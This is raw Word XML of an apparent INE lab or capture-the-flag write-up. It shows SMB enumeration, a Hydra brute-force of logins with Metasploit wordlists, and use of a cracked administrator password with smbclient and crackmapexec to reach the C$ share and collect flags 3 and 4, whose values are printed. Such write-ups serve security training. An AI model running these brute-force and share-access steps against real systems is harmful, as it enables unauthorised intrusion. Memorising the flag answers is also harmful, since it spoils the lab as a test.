      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003363DD">
        <w:t xml:space="preserve"> target2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396542B5" w14:textId="75EB7622" w:rsidR="003363DD" w:rsidRPr="00D900A6" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="651FE22C" wp14:editId="14A72F1D">
            <wp:extent cx="5855001" cy="4127712"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13727677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67783" name="Picture 13727677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41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C691" w14:textId="31813F49" w:rsidR="00D900A6" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46659515" wp14:editId="6AEFEEDD">
            <wp:extent cx="5835950" cy="3772094"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="861430321" name="Picture 33" descr="A computer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30321" name="Picture 33" descr="A computer screen shot of a computer erro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D0A3" w14:textId="463B5EAF" w:rsidR="003363DD" w:rsidRDefault="003363DD" w:rsidP="00D900A6">
      <w:r w:rsidRPr="003363DD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SMB is running </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003363DD">
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003363DD">
        <w:t xml:space="preserve"> the default port 445</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA29CD" w14:textId="378108E8" w:rsidR="00D900A6" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00186BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enum4linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00186BAC">
        <w:t> is a tool for enumerating information from Windows and Samba systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1CDD60" w14:textId="555B1753" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00186BAC">
        <w:t>enum4linux -a target2.ine.local</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21343BE5" w14:textId="21BC7B3C" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D0813D" wp14:editId="11C3D1BB">
            <wp:extent cx="5886753" cy="4419827"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19416630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63075" name="Picture 194166307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B3A3" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6"/>
    <w:p w14:paraId="77613C34" w14:textId="0B156ACA" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Nothing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>throught</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365CC83" w14:textId="249120EB" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the username and password as don’t </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>thing :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="48639276" w14:textId="77777777" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6"/>
    <w:p w14:paraId="58417AAF" w14:textId="47BD1B3D" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00186BAC">
        <w:t>hydra -L /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt smb://target2.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AEACAF" w14:textId="42C63840" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4968CF88" wp14:editId="0FEB127E">
            <wp:extent cx="5810549" cy="3422826"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="201517623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76238" name="Picture 20151762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372" w14:textId="77777777" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6"/>
    <w:p w14:paraId="1E077D41" w14:textId="6014412A" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve">We have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>discover</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the various username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF766C1" w14:textId="77777777" w:rsidR="00DA192B" w:rsidRDefault="00DA192B" w:rsidP="00D900A6"/>
    <w:p w14:paraId="59DB6530" w14:textId="19718700" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>L //</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00186BAC">
        <w:t>target2.ine.local -U administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DABEC4" w14:textId="77777777" w:rsidR="00DA192B" w:rsidRDefault="00DA192B" w:rsidP="00D900A6"/>
    <w:p w14:paraId="2B898934" w14:textId="6E2DE259" w:rsidR="00186BAC" w:rsidRDefault="00186BAC" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00186BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00186BAC">
        <w:t>This is the host you are targeting. The double forward slash // indicates that the following part of the command is the network address of the server. target2.ine.local is the server's name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DAF1F2" w14:textId="77777777" w:rsidR="00DA192B" w:rsidRDefault="00DA192B" w:rsidP="00D900A6"/>
    <w:p w14:paraId="4688EC89" w14:textId="55E242A5" w:rsidR="00186BAC" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6423913A" wp14:editId="6531A9D5">
            <wp:extent cx="5708943" cy="2521080"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1610134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3459" name="Picture 16101345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1CDB" w14:textId="475532C7" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00373B29">
        <w:t xml:space="preserve">let’s check the permissions </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for each </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shares</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0589A0C9" w14:textId="6FE137CA" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00373B29">
        <w:t>crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00373B29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00373B29">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00373B29">
        <w:t xml:space="preserve"> target2.ine.local -u administrator -p pineapple </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00373B29">
        <w:t>shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC10FF7" w14:textId="09A5CD8E" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38CB727D" wp14:editId="08C06BA9">
            <wp:extent cx="5918504" cy="3568883"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="5624164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1646" name="Picture 562416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8AA7" w14:textId="77777777" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6"/>
    <w:p w14:paraId="3E74C389" w14:textId="00C13483" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00373B29">
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00373B29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00373B29">
        <w:t>discover</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00373B29">
        <w:t xml:space="preserve"> that only two shares have read and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00373B29">
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00373B29">
        <w:t xml:space="preserve"> permissions: ADMIN$ and C</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00373B29">
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23583DBC" w14:textId="2890D01D" w:rsidR="0073445B" w:rsidRDefault="0073445B" w:rsidP="00D900A6">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="0073445B">
        <w:t xml:space="preserve">"C$" is a type of </w:t>
      </w:r>
      <w:r w:rsidRPr="0073445B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administrative share</w:t>
      </w:r>
      <w:r w:rsidRPr="0073445B">
        <w:t xml:space="preserve"> on a Windows operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D823C68" w14:textId="6A5D03F8" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00373B29">
        <w:t>Since C$ is the default share,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449831B1" w14:textId="5559684B" w:rsidR="00373B29" w:rsidRDefault="00373B29" w:rsidP="00D900A6">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  //target2.ine.local/C</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>$ -U administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4B918" w14:textId="2B9D6BD0" w:rsidR="00373B29" w:rsidRDefault="00BE1D48" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="513DCC59" wp14:editId="769B25D7">
            <wp:extent cx="5816899" cy="4419827"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59814767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47670" name="Picture 59814767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2A6A" w14:textId="77777777" w:rsidR="00BE1D48" w:rsidRDefault="00BE1D48" w:rsidP="00D900A6"/>
    <w:p w14:paraId="3B367EC4" w14:textId="762ED73F" w:rsidR="00BE1D48" w:rsidRDefault="00BE1D48" w:rsidP="00D900A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E0481AC" wp14:editId="61B96813">
            <wp:extent cx="3524431" cy="603281"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="688375059" name="Picture 39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5059" name="Picture 39" descr="A number on a black background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E863" w14:textId="3422D27D" w:rsidR="00BE1D48" w:rsidRDefault="00BE1D48" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1D48">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE1D48">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0ef234765f9043c9885e63726853e217</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD629B" w14:textId="4E872686" w:rsidR="00BE1D48" w:rsidRDefault="00BE1D48" w:rsidP="00D900A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DDC463" wp14:editId="4359A925">
            <wp:extent cx="4165814" cy="755689"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="962147080" name="Picture 4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47080" name="Picture 40" descr="A black background with white text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F484" w14:textId="77777777" w:rsidR="00BE1D48" w:rsidRPr="00D900A6" w:rsidRDefault="00BE1D48" w:rsidP="00D900A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EA22BC" w14:textId="77777777" w:rsidR="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00D900A6">
        <w:t>: The Desktop directory might have what you're looking for. Enumerate its contents. (target2.ine.local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4191D975" w14:textId="5317040B" w:rsidR="00D900A6" w:rsidRPr="00D900A6" w:rsidRDefault="00D900A6" w:rsidP="00D900A6">
      <w:r w:rsidRPr="00D900A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742AFC75" w14:textId="615A71C9" w:rsidR="00D900A6" w:rsidRDefault="00D900A6"/>
    <w:p w14:paraId="3D0215F0" w14:textId="4655BD1C" w:rsidR="00724439" w:rsidRDefault="00724439">
      <w:r w:rsidRPr="00724439">
        <w:t>cd Users\Administrator\Desktop\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D630D" w14:textId="77777777" w:rsidR="00724439" w:rsidRDefault="00724439"/>
    <w:p w14:paraId="09AAB0EC" w14:textId="3E503B56" w:rsidR="00724439" w:rsidRDefault="00724439">
      <w:r>
        <w:t>get flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110C9CD" w14:textId="1713FCCF" w:rsidR="00724439" w:rsidRDefault="00724439">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74D63C81" wp14:editId="6CF494A0">
            <wp:extent cx="5759746" cy="1816193"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="580486709" name="Picture 4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86709" name="Picture 41" descr="A computer screen shot of a computer code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D2BB" w14:textId="694FD5A3" w:rsidR="00724439" w:rsidRDefault="00724439">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C3B218" wp14:editId="54646E02">
            <wp:extent cx="3410125" cy="660434"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1982917590" name="Picture 42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7590" name="Picture 42" descr="A close up of a numb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83E6" w14:textId="5D89DAA5" w:rsidR="00724439" w:rsidRDefault="00724439">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00724439">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00724439">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>be651f4ee6e542f8a9378c3fdef11464</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D861E9D" w14:textId="05A57A2E" w:rsidR="00724439" w:rsidRDefault="0072443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112F42" wp14:editId="4E674802">
            <wp:extent cx="4172164" cy="774740"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1526576814" name="Picture 4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76814" name="Picture 43" descr="A black background with white text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B34">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E0A47" w14:textId="77777777" w:rsidR="00AA6B34" w:rsidRDefault="00AA6B34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4846C680" w14:textId="48B205F0" w:rsidR="00AA6B34" w:rsidRDefault="00AA6B34" w:rsidP="00AA6B34">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DONE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7812CF08" w14:textId="21B9FC15" w:rsidR="00AA6B34" w:rsidRPr="00724439" w:rsidRDefault="00AA6B3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7086C5F" wp14:editId="4EAA9611">
            <wp:extent cx="4369025" cy="4267419"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1453476697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76697" name="Picture 44" descr="A screen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B34" w:rsidRPr="00724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81AB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="449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44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8C"/>
    <w:rsid w:val="00186BAC"/>
    <w:rsid w:val="0022281F"/>
    <w:rsid w:val="003363DD"/>
    <w:rsid w:val="00373B29"/>
    <w:rsid w:val="003E7448"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00724439"/>
    <w:rsid w:val="0073445B"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00AA6B34"/>
    <w:rsid w:val="00AA7420"/>
    <w:rsid w:val="00AE1266"/>
    <w:rsid w:val="00BE1D48"/>
    <w:rsid w:val="00D71A42"/>
    <w:rsid w:val="00D900A6"/>
    <w:rsid w:val="00DA192B"/>
    <w:rsid w:val="00E22295"/>
    <w:rsid w:val="00F9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B01C1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FE6D7AD6-D401-4C52-9E80-F4782CD2A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2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2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3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22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2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target1.ine.local/webdav" TargetMode="External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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.tmp"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28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image" Target="media/image27.tmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target1.ine.local/webdav" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.tmp"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23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18.tmp"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.tmp"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.tmp"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.tmp"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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9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Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.tmp"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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17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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-03T08:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-03T09:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>